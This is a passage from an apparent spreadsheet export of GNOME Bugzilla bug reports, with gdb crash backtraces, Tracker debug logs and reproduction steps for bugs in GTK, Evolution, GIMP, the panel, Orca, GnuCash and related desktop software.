#28 0x404b3b21 in gtk_marshal_BOOL__POINTER (object=0x8134b00 
    func=0x409fa6c8  func_data=0x0 
    args=0xbffff5b0) at gtkmarshal.c:28
#29 0x404e28fb in gtk_signal_real_emit (object=0x8134b00 signal_id=48 
    params=0xbffff5b0) at gtksignal.c:1492
#30 0x404e0930 in gtk_signal_emit (object=0x8134b00 signal_id=48)
    at gtksignal.c:552
#31 0x40517de8 in gtk_widget_event (widget=0x8134b00 event=0x81b27b8)
    at gtkwidget.c:2864
#32 0x404b3a1c in gtk_propagate_event (widget=0x8173728 event=0x81b27b8)
    at gtkmain.c:1360
#33 0x404b2c55 in gtk_main_do_event (event=0x81b27b8) at gtkmain.c:818
#34 0x4056c16b in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffff980 user_data=0x0) at gdkevents.c:2139
#35 0x4059d055 in g_main_dispatch (dispatch_time=0xbffff980) at gmain.c:656
#36 0x4059d659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#37 0x4059d7e8 in g_main_run (loop=0x8133128) at gmain.c:935
#38 0x404b255b in gtk_main () at gtkmain.c:524
#39 0x4093155f in bonobo_main () at bonobo-main.c:283
#40 0x080ad527 in main (argc=3 argv=0xbffffa74) at main.c:156
#41 0x40b18306 in __libc_start_main (main=0x80ad484  argc=3 
    ubp_av=0xbffffa74 init=0x8066d04  fini=0x80e655c  
    rtld_fini=0x4000d2cc  stack_end=0xbffffa6c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40bafc09 in __wait4 () from /lib/libc.so.6
#0  0x40bafc09 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40c2bfd0 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x407d58de in waitpid (pid=19015 stat_loc=0xbfffe0dc options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbfffe0dc
options = 0
result = 0
oldtype = 0
#3  0x4030a262 in gnome_segv_handle (signum=11) at gnome-init.c:659
	in gnome-init.c
estatus = 135479836
in_segv = 1
pid = 0
#4  0x407d34c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 135744048 esi = 135482112 ebp = 3221218584 esp = 3221218432 ebx = 1084432540 edx = 135875336 ecx = 4 eax = 0 trapno = 14 err = 4 eip = 1084207453 cs = 35 __csh = 0 eflags = 66050 esp_at_signal = 3221218432 ss = 43 __ssh = 0 fpstate = 0xbfffe200 oldmask = 2147483648 cr2 = 12})
    at signals.c:97
	in signals.c
self = 0x407dc460
in_sighandler = 0x0
self = 0x407dc460
in_sighandler = 0x0
#5  
No locals.
#6  0x409fb15d in bonobo_plug_set_focus (window=0x8134b00 focus=0x8174a30)
    at bonobo-plug.c:492
	in bonobo-plug.c
xevent = {type = 9 xany = {type = 9 serial = 142 send_event = 1079025107 
    display = 0x404c713e window = 0} xkey = {type = 9 serial = 142 
    send_event = 1079025107 display = 0x404c713e window = 0 
    root = 1079325044 subwindow = 3221218536 time = 1079598422 
    x = 135482124 y = 1079325044 x_root = -1073748760 y_root = 1078751671 
    state = 135482124 keycode = 142 same_screen = 1079025107} xbutton = {
    type = 9 serial = 142 send_event = 1079025107 display = 0x404c713e 
    window = 0 root = 1079325044 subwindow = 3221218536 time = 1079598422 
    x = 135482124 y = 1079325044 x_root = -1073748760 y_root = 1078751671 
    state = 135482124 button = 142 same_screen = 1079025107} xmotion = {
    type = 9 serial = 142 send_event = 1079025107 display = 0x404c713e 
    window = 0 root = 1079325044 subwindow = 3221218536 time = 1079598422 
    x = 135482124 y = 1079325044 x_root = -1073748760 y_root = 1078751671 
    state = 135482124 is_hint = -114 '\216' same_screen = 1079025107} 
  xcrossing = {type = 9 serial = 142 send_event = 1079025107 
    display = 0x404c713e window = 0 root = 1079325044 
    subwindow = 3221218536 time = 1079598422 x = 135482124 y = 1079325044 
    x_root = -1073748760 y_root = 1078751671 mode = 135482124 detail = 142 
    same_screen = 1079025107 focus = 1078751550 state = 0} xfocus = {
    type = 9 serial = 142 send_event = 1079025107 display = 0x404c713e 
    window = 0 mode = 1079325044 detail = -1073748760} xexpose = {type = 9 
    serial = 142 send_event = 1079025107 display = 0x404c713e window = 0 
    x = 1079325044 y = -1073748760 width = 1079598422 height = 135482124 
    count = 1079325044} xgraphicsexpose = {type = 9 serial = 142 
    send_event = 1079025107 display = 0x404c713e drawable = 0 
    x = 1079325044 y = -1073748760 width = 1079598422 height = 135482124 
    count = 1079325044 major_code = -1073748760 minor_code = 1078751671} 
  xnoexpose = {type = 9 serial = 142 send_event = 1079025107 
    display = 0x404c713e drawable = 0 major_code = 1079325044 
    minor_code = -1073748760} xvisibility = {type = 9 serial = 142 
    send_event = 1079025107 display = 0x404c713e window = 0 
    state = 1079325044} xcreatewindow = {type = 9 serial = 142 
    send_event = 1079025107 display = 0x404c713e parent = 0 
    window = 1079325044 x = -1073748760 y = 1079598422 width = 135482124 
    height = 1079325044 border_width = -1073748760 
    override_redirect = 1078751671} xdestroywindow = {type = 9 serial = 142 
    send_event = 1079025107 display = 0x404c713e event = 0 
    window = 1079325044} xunmap = {type = 9 serial = 142 
    send_event = 1079025107 display = 0x404c713e event = 0 
    window = 1079325044 from_configure = -1073748760} xmap = {type = 9 
    serial = 142 send_event = 1079025107 display = 0x404c713e event = 0 
    window = 1079325044 override_redirect = -1073748760} xmaprequest = {
    type = 9 serial = 142 send_event = 1079025107 display = 0x404c713e 
    parent = 0 window = 1079325044} xreparent = {type = 9 serial = 142 
    send_event = 1079025107 display = 0x404c713e event = 0 
    window = 1079325044 parent = 3221218536 x = 1079598422 y = 135482124 
    override_redirect = 1079325044} xconfigure = {type = 9 serial = 142 
    send_event = 1079025107 display = 0x404c713e event = 0 
    window = 1079325044 x = -1073748760 y = 1079598422 width = 135482124 
    height = 1079325044 border_width = -1073748760 above = 1078751671 
    override_redirect = 135482124} xgravity = {type = 9 serial = 142 
    send_event = 1079025107 display = 0x404c713e event = 0 
    window = 1079325044 x = -1073748760 y = 1079598422} xresizerequest = {
    type = 9 serial = 142 send_event = 1079025107 display = 0x404c713e 
    window = 0 width = 1079325044 height = -1073748760} 
  xconfigurerequest = {type = 9 serial = 142 send_event = 1079025107 
    display = 0x404c713e parent = 0 window = 1079325044 x = -1073748760 
    y = 1079598422 width = 135482124 height = 1079325044 
    border_width = -1073748760 above = 1078751671 detail = 135482124 
    value_mask = 142} xcirculate = {type = 9 serial = 142 
    send_event = 1079025107 display = 0x404c713e event = 0 
    window = 1079325044 place = -1073748760} xcirculaterequest = {type = 9 
    serial = 142 send_event = 1079025107 display = 0x404c713e parent = 0 
    window = 1079325044 place = -1073748760} xproperty = {type = 9 
    serial = 142 send_event = 1079025107 display = 0x404c713e window = 0 
    atom = 1079325044 time = 3221218536 state = 1079598422} 
  xselectionclear = {type = 9 serial = 142 send_event = 1079025107 
    display = 0x404c713e window = 0 selection = 1079325044 
    time = 3221218536} xselectionrequest = {type = 9 serial = 142 
    send_event = 1079025107 display = 0x404c713e owner = 0 
    requestor = 1079325044 selection = 3221218536 target = 1079598422 
    property = 135482124 time = 1079325044} xselection = {type = 9 
    serial = 142 send_event = 1079025107 display = 0x404c713e 
    requestor = 0 selection = 1079325044 target = 3221218536 
    property = 1079598422 time = 135482124} xcolormap = {type = 9 
    serial = 142 send_event = 1079025107 display = 0x404c713e window = 0 
    colormap = 1079325044 new = -1073748760 state = 1079598422} xclient = {
    type = 9 serial = 142 send_event = 1079025107 display = 0x404c713e 
    window = 0 message_type = 1079325044 format = -1073748760 data = {
      b = V]Y@\fK\023\bt1U@Ð¸Ð´ÑÑ—Â·qL@ s = {23894 16473 19212 2067 12660 
        16469 -6936 -16385 29111 16460} l = {1079598422 135482124 
        1079325044 -1073748760 1078751671}}} xmapping = {type = 9 
    serial = 142 send_event = 1079025107 display = 0x404c713e window = 0 
    request = 1079325044 first_keycode = -1073748760 count = 1079598422} 
  xerror = {type = 9 display = 0x8e resourceid = 1079025107 
    serial = 1078751550 error_code = 0 '\000' request_code = 0 '\000' 
    minor_code = 0 '\000'} xkeymap = {type = 9 serial = 142 
    send_event = 1079025107 display = 0x404c713e window = 0 
    key_vector = t1U@Ð¸Ð´ÑÑ—V]Y@\fK\023\bt1U@Ð¸Ð´ÑÑ—Â·qL@\fK\023\b} pad = {9 142 
    1079025107 1078751550 0 1079325044 -1073748760 1079598422 135482124 
    1079325044 -1073748760 1078751671 135482124 142 1079025107 
    1078751550 0 1079325044 -1073748712 1078405464 135482112 142 34 
    1078866374}}
window = (GtkWindow *) 0x8174a30
focus = (GtkWidget *) 0x8134b00
plug = (BonoboPlug *) 0x8134b00
priv = (BonoboPlugPrivate *) 0x818cb30
#7  0x404b3c6d in gtk_marshal_NONE__POINTER (object=0x8134b00 
    func=0x409fb094  func_data=0x0 args=0xbfffe5d0)
    at gtkmarshal.c:193
	in gtkmarshal.c
args = (GtkArg *) 0xfffffe00
</t>
  </si>
  <si>
    <t>geofuz</t>
  </si>
  <si>
    <t>TRACKER-459952</t>
  </si>
  <si>
    <t>Tracker 0.6.0 doesn't work properly with non utf Evolution mails</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Start trackerd in a terminal let it index everything.
2. Start tracker-search-tool and search for something that might be found in an Evolution mail with non-utf characters.
3. Select the mail category and watch trackerd stop while tracker-search-tool spits out an error message saying The following has occured : Message did not receive a reply (timeout by message bus).
Stack trace:
$ gdb
GNU gdb 6.6
Copyright (C) 2006 Free Software Foundation Inc.
GDB is free software covered by the GNU General Public License and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB.  Type show warranty for details.
This GDB was configured as i686-pc-linux-gnu.
(gdb) set args --verbosity=4
(gdb) file trackerd
Reading symbols from /usr/bin/trackerd...Reading symbols from /usr/lib/debug/usr/bin/trackerd.debug...done.
Using host libthread_db library /lib/libthread_db.so.1.
done.
(gdb) run
Starting program: /usr/bin/trackerd --verbosity=4
[Thread debugging using libthread_db enabled]
[New Thread -1212835168 (LWP 2206)]
Tracker version 0.6.0 Copyright (c) 2005-2006 by Jamie McCracken (jamiemcc@gnome.org)
This program is free software and comes without any warranty.
It is licensed under version 2 or later of the General Public License which can be viewed at http://www.gnu.org/licenses/gpl.txt
Initialising tracker...
setting stopword list for language code sv
Using stemmer for language swedish
Tracker configuration options :
Verbosity : ........................  4
Low memory mode : ..................  no
Indexing enabled : .................  yes
Watching enabled : .................  yes
File content indexing enabled : ....  yes
Thumbnailing enabled : .............  yes
Evolution email indexing enabled : .  yes
Thunderbird email indexing enabled :  no
K-Mail indexing enabled : ..........  no
Tracker indexer parameters :
Indexer language code : ............  sv
Minimum index word length : ........  3
Maximum index word length : ........  30
Stemmer enabled : ..................  yes
Setting watch directory roots to:
/pub/musik
/home/sachankara
throttle level is 20
Using Sqlite version 3.3.17
Loading prepared queries...
File loaded in  0334000 ms
initialising the indexer
Opening index /home/sachankara/.cache/tracker/Files
Bucket count (max is 524288) is 180212 and Record Count is 166608
Preferred bucket count is 166608
[New Thread -1214927984 (LWP 2209)]
[Thread -1214927984 (LWP 2209) exited]
[New Thread -1223320688 (LWP 2210)]
[Thread -1223320688 (LWP 2210) exited]
loaded sql file sqlite-cache.sql
Database closed for thread main
adding service definition for default with id 1
adding service definition for Files with id 2
adding service definition for Folders with id 3
adding service definition for Documents with id 4
adding service definition for Images with id 5
adding service definition for Music with id 6
adding service definition for Videos with id 7
adding service definition for Text with id 8
adding service definition for Development with id 9
adding service definition for Other with id 10
adding service definition for Emails with id 11
adding service definition for EvolutionEmails with id 12
adding service definition for KMailEmails with id 13
adding service definition for EmailAttachments with id 14
adding service definition for EvolutionAttachments with id 15
adding service definition for KMailAttachments with id 16
adding service definition for Conversations with id 17
adding service definition for GaimConversations with id 18
adding service definition for Applications with id 19
[New Thread -1223320688 (LWP 2211)]
Setting inotify watch limit to 8191.
[New Thread -1214927984 (LWP 2212)]
starting indexing...
0 files are pending with count 0
starting config indexing
0 files are pending with count 0
starting application indexing
... snip ...
0 files are pending with count 0
0 files are pending with count 0
Executing detailed search with params Emails sweclockers unix 0 10
email://local@local/Arkiverat/Forum och bugzillas/SweClockers.comuid=703 Emails Evolution/Email Reply to post 'Folding@SweClockers.com - Bli medlem du ocksï¿½ och       gï¿½r nï¿½got vettigt med din dator!' SweClockers.com - Forum Mailer 
email://local@local/Arkiverat/Forum och bugzillas/SweClockers.comuid=585 Emails Evolution/Email Reply to post 'Folding@SweClockers.com - Bli medlem du ocksï¿½ och       gï¿½r nï¿½got vettigt med din dator!' SweClockers.com - Forum Mailer 
email://local@local/Arkiverat/Forum och bugzillas/SweClockers.comuid=545 Emails Evolution/Email Reply to post 'Folding@SweClockers.com - Bli medlem du ocksï¿½ och       gï¿½r nï¿½got vettigt med din dator!' SweClockers.com - Forum Mailer 
email://local@local/Arkiverat/Forum och bugzillas/SweClockers.comuid=513 Emails Evolution/Email Reply to post 'Folding@SweClockers.com - Bli medlem du ocksï¿½ och       gï¿½r nï¿½got vettigt med din dator!' SweClockers.com - Forum Mailer 
email://local@local/Arkiverat/Forum och bugzillas/SweClockers.comuid=509 Emails Evolution/Email Reply to post 'Folding@SweClockers.com - Bli medlem du ocksï¿½ och       gï¿½r nï¿½got vettigt med din dator!' SweClockers.com - Forum Mailer 
email://local@local/Arkiverat/Forum och bugzillas/SweClockers.comuid=479 Emails Evolution/Email Reply to post 'Folding@SweClockers.com - Bli medlem du ocksï¿½ och       gï¿½r nï¿½got vettigt med din dator!' SweClockers.com - Forum Mailer 
email://local@local/Arkiverat/Forum och bugzillas/SweClockers.comuid=471 Emails Evolution/Email Reply to post 'Folding@SweClockers.com - Bli medlem du ocksï¿½ och       gï¿½r nï¿½got vettigt med din dator!' SweClockers.com - Forum Mailer 
email://local@local/Arkiverat/Forum och bugzillas/SweClockers.comuid=425 Emails Evolution/Email Reply to post 'Folding@SweClockers.com - Bli medlem du ocksï¿½ och       gï¿½r nï¿½got vettigt med din dator!' SweClockers.com - Forum Mailer 
email://local@local/Arkiverat/Forum och bugzillas/SweClockers.comuid=407 Emails Evolution/Email Reply to post 'Folding@SweClockers.com - Bli medlem du ocksï¿½ och       gï¿½r nï¿½got vettigt med din dator!' SweClockers.com - Forum Mailer 
email://local@local/Arkiverat/Forum och bugzillas/SweClockers.comuid=405 Emails Evolution/Email Reply to post 'Folding@SweClockers.com - Bli medlem du ocksï¿½ och       gï¿½r nï¿½got vettigt med din dator!' SweClockers.com - Forum Mailer 
DBus connection has been lost trackerd will shutdown
Received signal 'DBus connection lost' so now shutting down
Total allocations = 2058 total deallocations = 2058
shutting down threads
Database closed for thread files
Database closed for thread main
Database closed for thread main
[Thread -1214927984 (LWP 2212) exited]
Database closed for thread request
Database closed for thread main
Database closed for thread main
request thread has exited successfully
[Thread -1223320688 (LWP 2211) exited]
Database closed for thread main
shutting down main thread
Program exited normally.
(gdb) backtrace 
No stack.
(gdb) 
Other information:
As I mentioned earlier it seems that any mail containing non-utf characters will cause trackerd to stop/shut down.
Any searches where the results contain only utf characters (such as the tracker mailing list) works just fine.</t>
  </si>
  <si>
    <t>fhm.blom</t>
  </si>
  <si>
    <t>GIMP-484123</t>
  </si>
  <si>
    <t>Windows Installer</t>
  </si>
  <si>
    <t>SVG File parsing Failed</t>
  </si>
  <si>
    <t>Please describe the problem:
The following SVG file from Open Cliparts can't be opened :
http://openclipart.org/people/johnny_automatic/johnny_automatic_calcubot.svg
Error pop-up says XML data parsing failed.
The image can be opened with inkscape.
Steps to reproduce:
1. Open the file
2. 
3. 
Actual results:
Error pop-up says XML data parsing failed.
Expected results:
The file to be displayed
Does this happen every time?
Yes
Other information:
The image can be opened with inkscape.</t>
  </si>
  <si>
    <t>jernej-bugzilla.gnome</t>
  </si>
  <si>
    <t>franck.depierre</t>
  </si>
  <si>
    <t>GNOME-CORE-35283</t>
  </si>
  <si>
    <t>panel crashed twice</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  panel
Severity: normal
Version:  1.2.4
Synopsis: panel crashed twice
Class:    sw-bug
Distribution: Red Hat Linux release 6.1 (Cartman)
System: Linux 2.4.0-test8 i686 unknown
C library: glibc-2.1.3-15
C compiler: 2.95.3
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.5
gnome-libs: gnome-libs 1.2.8
libxml: 1.8.10
gnome-print: gnome-print-0.25
gnome-core: gnome-core 1.2.4
Description:
I think this came about from the email applet.  I use the spinning e
cloud guy to monitor my IMAP on another box.  When IMAP was busy with a
very large message (big attachment) and the biff applet tried to check
for new mail I get the panel crashing.
Debugging information:
0x405848e9 in __wait4 () from /lib/libc.so.6
#0  0x405848e9 in __wait4 () from /lib/libc.so.6
#1  0x405e31ec in __DTOR_END__ () from /lib/libc.so.6
#2  0x40150781 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  0x40511c68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
#4  0x40546b0e in _IO_vsscanf (string=0x0 
    format=0x40679242 %*s %*s %*s %*s %d %*s %d args=0xbffff380)
    at iovsscanf.c:43
#5  0x405448ef in sscanf () at sscanf.c:42
#6  0x40675a7f in imap_check () from /usr/lib/libgen_util_applet.so
#7  0x4067183e in check_mail_file_status () from /usr/lib/libgen_util_applet.so
#8  0x40671c27 in mail_check_timeout () from /usr/lib/libgen_util_applet.so
#9  0x4009004d in g_timeout_dispatch () from /usr/lib/libglib-1.2.so.0
#10 0x4008f186 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#11 0x4008f751 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#12 0x4008f8f1 in g_main_run () from /usr/lib/libglib-1.2.so.0
#13 0x402918e9 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#14 0x8055fee in main ()
#15 0x4050b9cb in __libc_start_main () at ../sysdeps/generic/libc-start.c:122
#0  0x405848e9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x405e31ec in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40150781 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  0x40511c68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
No locals.
#4  0x40546b0e in _IO_vsscanf (string=0x0 
    format=0x40679242 %*s %*s %*s %*s %d %*s %d args=0xbffff380)
    at iovsscanf.c:43
string = 0x0
ret = -512
sf = {_sbf = {_f = {_flags = -72548352 _IO_read_ptr = 0x0 
      _IO_read_end = 0x0 _IO_read_base = 0x0 _IO_write_base = 0x0 
      _IO_write_ptr = 0x0 _IO_write_end = 0x0 _IO_buf_base = 0x0 
      _IO_buf_end = 0x0 _IO_save_base = 0x0 _IO_backup_base = 0x0 
      _IO_save_end = 0x0 _markers = 0x0 _chain = 0x0 _fileno = 255 
      _blksize = 0 _old_offset = 0 _cur_column = 0 
      _vtable_offset = 0 '\000' _shortbuf =  _lock = 0xbffff2a0 
      _offset = 0 _unused2 = {0 0 0 0 0 -1073745064 1073784829 
        135695688 135705968 7 1073784654 1080540832 0 22 135663480 
        1080484884}} _vtable = 0x405e1b00} _s = {
    _allocate_buffer = 0x4066f324  
    _free_buffer = 0x404fa2e0 }}
lock = {__m_reserved = 1078960864 __m_count = 1111 __m_owner = 0x404fcfd0 
  __m_kind = 1078943088 __m_lock = {__status = 1078622048 __spinlock = 38}}
#5  0x405448ef in sscanf () at sscanf.c:42
No locals.
#6  0x40675a7f in imap_check () from /usr/lib/libgen_util_applet.so
No symbol table info available.
#7  0x4067183e in check_mail_file_status () from /usr/lib/libgen_util_applet.so
No symbol table info available.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 13:18 -------
This bug was previously known as bug 35283 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=35283
Originally filed under the gnome-core product and panel component.
Unknown version 1.2.x in product gnome-core. Setting version to the default unspecified.
The original reporter (sean@mcneil.com) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>GNOME-USER-DOCS-619565</t>
  </si>
  <si>
    <t>user-guide</t>
  </si>
  <si>
    <t>GNOME-USER-DOCS</t>
  </si>
  <si>
    <t>Grammar error in user-guide section 2.3</t>
  </si>
  <si>
    <t>The third sentence of the user-guide section 2.3 entitled Windows looks like this: 'Each window displays an application allowing you to to have more than one application visible and work on more than one task at a time.' - the allowing you to to have part is not correct there should be only one to.</t>
  </si>
  <si>
    <t>evfool</t>
  </si>
  <si>
    <t>GTK+-325817</t>
  </si>
  <si>
    <t>FileChooserButton uses Home instead of directory name</t>
  </si>
  <si>
    <t>To be consistent with GtkFileChooserDefault and Nautilus GtkFileChooserButton should not use Home in its drop-down menu but rather the plain $HOME name.</t>
  </si>
  <si>
    <t>BRASERO-588604</t>
  </si>
  <si>
    <t>libbrasero-media</t>
  </si>
  <si>
    <t>pkgconfig file libbrasero-media.pc still references hal</t>
  </si>
  <si>
    <t>Hal support has been removed from brasero so the pkgconfig file needs fixing.</t>
  </si>
  <si>
    <t>GNOME-APPLETS-156129</t>
  </si>
  <si>
    <t>trash applet</t>
  </si>
  <si>
    <t>Trash applet does not use standard GPL header</t>
  </si>
  <si>
    <t>The copyright header in trashapplet.c and trashapplet.h reads as follows:
 * This program is free software you can redistribute it and/or modify
 * it under the terms of the GNU General Public License VERSION 2 as
 * published by the Free Software Foundation.  You are not allowed to
 * use any other version of the license unless you got the explicit
 * permission from the author to do so.
This will cause a problem if we want to relicense gnome-applets under a later
version of the GPL at some point.  Is there any reason for the non-standard
wording you've used here?
I've gone ahead and altered the wording in trash-monitor.[ch] since it only
contains contributions from me and code that was licensed under the GPL 2 or
newer version.
For the record I don't mind my contributions to trashapplet.[ch] to be
distributed under later versions of the GPL.</t>
  </si>
  <si>
    <t>EPIPHANY-172694</t>
  </si>
  <si>
    <t>Ctrl+L does not show location bar when the location bar is hidden on start</t>
  </si>
  <si>
    <t>This bug has been opened here: https://bugzilla.ubuntu.com/8669
To reproduce it the URL bar must be hidden when Epiphany starts. (You can do
this by exiting it with the bar hidden.) Then when you start Epiphany again
Ctrl+L will not show the location bar.
Pressing Ctrl+Shift+T twice to unhide and rehide the bar will make Ctrl+L work
again.</t>
  </si>
  <si>
    <t>EVOLUTION-245402</t>
  </si>
  <si>
    <t>Contact drag to Contact List Editor does not work</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.4.0
Synopsis: Contact drag to Contact List Editor does not work
Bugzilla-Product: Evolution
Bugzilla-Component: Contacts [was: Addressbook]
Description:
Description of Problem: when trying to construct a contact/mailing list
the instructions right above the input line for members says Type an
email address or drag a contact onto the list below:.  Dragging a
contact from the list either in Address Cards or Phone List view does
not work.  I would assume that you have to be in Address Cards view
mode.
Steps to reproduce the problem:
1. File -&gt; New -&gt; Contact List.  The Contact List Editor pops up.
2. View contacts in Phone List mode (View -&gt; Current View -&gt; Phone
List).
3. Drag a contact to the Member entry line in the Contact List Editor.
4. Nothing happens.
5. View contacts in Address Cards mode (View -&gt; Current View -&gt; Address
Cards).
6. Drag a contact to the Members entry line in the Contact List Editor. 
This time at least the mouse icon changes to a page.
7. When I let go the mouse at the Members entry line the page icon
floats back to the original location of the address card. 
8. Nothing else happens (no entry in the Members entry line in the
Contact List Editor).
Actual Results:
- Nothing
Expected Results:
- Some feedback that the Contact made it to the Members entry line in
the Contact List Editor.
How often does this happen?
- Every time.
Additional Information:
- RH9 KDE
Unknown reporter: lmh2671772@sbcglobal.net changed to bugbuddy-import@ximian.com.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>lmh2671772</t>
  </si>
  <si>
    <t>GALEON-126407</t>
  </si>
  <si>
    <t>bookmarks editor does not remember display settings</t>
  </si>
  <si>
    <t>If I disable the split-pane view in the bookmarks editor close the editor
and re-open it the split-pane view is enabled again. It seems display
settings are not saved for the bookmarks editor.
Also the split-pane view is really a pain. It's completely redundant
(folders are displayed on the left _and_ on the right) and much too
complex for a bookmarks editor (two tree views at the same time ?).
(btw: the Galeon version is 1.3.10 but this choice is not available in
Bugzilla)</t>
  </si>
  <si>
    <t>pitrou</t>
  </si>
  <si>
    <t>GNOME-PANEL-112078</t>
  </si>
  <si>
    <t>Open Recent filenames containing apostrophes can't be opened</t>
  </si>
  <si>
    <t>Description of Problem:
Choosing a filename containing an apostrophe from
the Open Recent menu brings up an error dialog and
does not open the document.
Steps to reproduce the problem:
1. Open gedit.
2. Type some text then save the file as
testin'.txt.
3. Close gedit.
4. Choose testin'.txt from the Open Recent menu.
Actual Results:
An error dialog containing the following text is
displayed:
Text ended before matching quote was found for '.
(The text was 'ooffice /home/ndt/testin'.txt')
Expected Results:
The document should be opened in gedit.
How often does this happen? 
Always.
Additional Information:
I'm running a clean Red Hat 9 installation.</t>
  </si>
  <si>
    <t>nathant</t>
  </si>
  <si>
    <t>GNOME-POWER-MANAGER-348710</t>
  </si>
  <si>
    <t>gnome-power-manager</t>
  </si>
  <si>
    <t>gnome-power-manager claims my battery is missing.</t>
  </si>
  <si>
    <t>Please describe the problem:
When selecting Information from the g-p-m menu the programs claims Status: missing for my battery even though it is there (see attached screenshot and /proc/ info). This is on an AMD64 HP nx6125 laptop running Ubuntu Edgy and g-p-m 2.15.90-0ubuntu1.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GNOME-PANEL-111313</t>
  </si>
  <si>
    <t>Menu Bar's context menu appears upon right-click on dead space</t>
  </si>
  <si>
    <t>The menu bar's context menu is called when the user right-clicks within
the menus on some dead space.
The easiest way to reproduce is to open the Actions menu and then
right-click one of the dividers. Can also be reproduced irregularly while
right-clicking as one moves the mouse up and down a top-level menu full of
items.
Does not seem to happen within submenus as there most menu items have
their own context menus.
Also appears not to happen with the 'Main Menu' applet.</t>
  </si>
  <si>
    <t>jer</t>
  </si>
  <si>
    <t>BEAGLE-171469</t>
  </si>
  <si>
    <t>Weblog (Blam) results don't contain the snippets</t>
  </si>
  <si>
    <t>Distribution/Version: SuSE 9.3
1. Start best.
2. Search for some string which is present in the blam weblogs.
3. The result is rendered in best but without any snippets highlighting the
searched string.</t>
  </si>
  <si>
    <t>beagle-bugs</t>
  </si>
  <si>
    <t>ssoni</t>
  </si>
  <si>
    <t>GNOME-KEYRING-326221</t>
  </si>
  <si>
    <t>Remember Always Allow between sessions.</t>
  </si>
  <si>
    <t>Every time I open a connected server (an scp connection for instance) I'm asked whether Nautilus should have access to my keyring so I click Always Allow. I'd like it to stop asking me even if I have restarted my computer.
I'm using Ubuntu Dapper.</t>
  </si>
  <si>
    <t>EVOLUTION-200650</t>
  </si>
  <si>
    <t>Need ability to set Reply-To in composer</t>
  </si>
  <si>
    <t>fejj</t>
  </si>
  <si>
    <t>ORCA-435199</t>
  </si>
  <si>
    <t>Orca is bloating the swap partition so the system is no more usable after a short time.</t>
  </si>
  <si>
    <t>Please describe the problem:
While working with Orca and different programs a huge amount of data gets 
swapped. The system becomes more and more sluggish and in the end it is no 
more usable. I have to reboot my computer or restart my X-session.
Steps to reproduce:
1. Start Orca
2. Start several applications
3. Do a lot of work writing and readign mail browsing the web 
reconfigure the Orca settings several times (general and application 
specific). Use programs that need a larger amount of memory such as Open 
Office.
Actual results:
The system slows down and in the end it does not respond and has to be 
rebooted.
Expected results:
The system should simply do the work without slowing down.
Does this happen every time?
It happens all the time.
Other information:
It happens since I've upgrated to Ubuntu Feisty.
On Edgy there was a certain sluggishness after a few hours of work but it 
cannot be compared to the behavior Feisty and Orca show after upgrading.
I run a 1 Ghz machine with 240 MB RAM. I use Orca with braille and speech 
but without a magnifier. I use Espeak as speech output with the 
Gnome-speech dirver.</t>
  </si>
  <si>
    <t>wwalker</t>
  </si>
  <si>
    <t>meinelisten</t>
  </si>
  <si>
    <t>GNUCASH-355660</t>
  </si>
  <si>
    <t>Reports</t>
  </si>
  <si>
    <t>GNUCASH</t>
  </si>
  <si>
    <t>'Advanced Portfolio' report confused by split transactions</t>
  </si>
  <si>
    <t>Debian bug 387031:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=387031
Package: gnucash
Version: 2.0.1-2
Severity: normal
With split transactions the 'advanced portfolio' report takes a
random split as the 'money in'. If you load the attached file in
gnucash and ask for the advanced portfolio report it shows the money in
as GBP -148.00 a total gain of GBP 307.00 and a net gain of -207.43%...
This was ok with v1.8.xx
Jeroen Nijhof</t>
  </si>
  <si>
    <t>GLIB-50219</t>
  </si>
  <si>
    <t>gobject</t>
  </si>
  <si>
    <t>s/Param/Property/ change is only half complete</t>
  </si>
  <si>
    <t>Need to be consistent about this impacts quite a bit of code and more
every day so should be fixed soonish.</t>
  </si>
  <si>
    <t>EVOLUTION-497810</t>
  </si>
  <si>
    <t>add Evolution FAQ menu item improve user-visible dialogs</t>
  </si>
  <si>
    <t>this will avoid all those useless can't send mail please help bug reports. people should use support forums for instead for such stuff.</t>
  </si>
  <si>
    <t>GAL-257354</t>
  </si>
  <si>
    <t>GalView</t>
  </si>
  <si>
    <t>saving custom view does not save column widths</t>
  </si>
  <si>
    <t>Description of Problem:
The width of the columns in the message list are not saved when saving and
replacing the existing view. The column widths should be saved and used
when viewing other folders with the same view.
Steps to reproduce the problem:
1. Customise a view by changing a column's width
2. Save the view (View &gt; Current View &gt; Save Custom View choose the
Replace Existing View radio button from the *terrible* dialog that appears).
3. Change to a different mail folder that uses the same view
Actual Results:
Columns are equally spaced.
Expected Results:
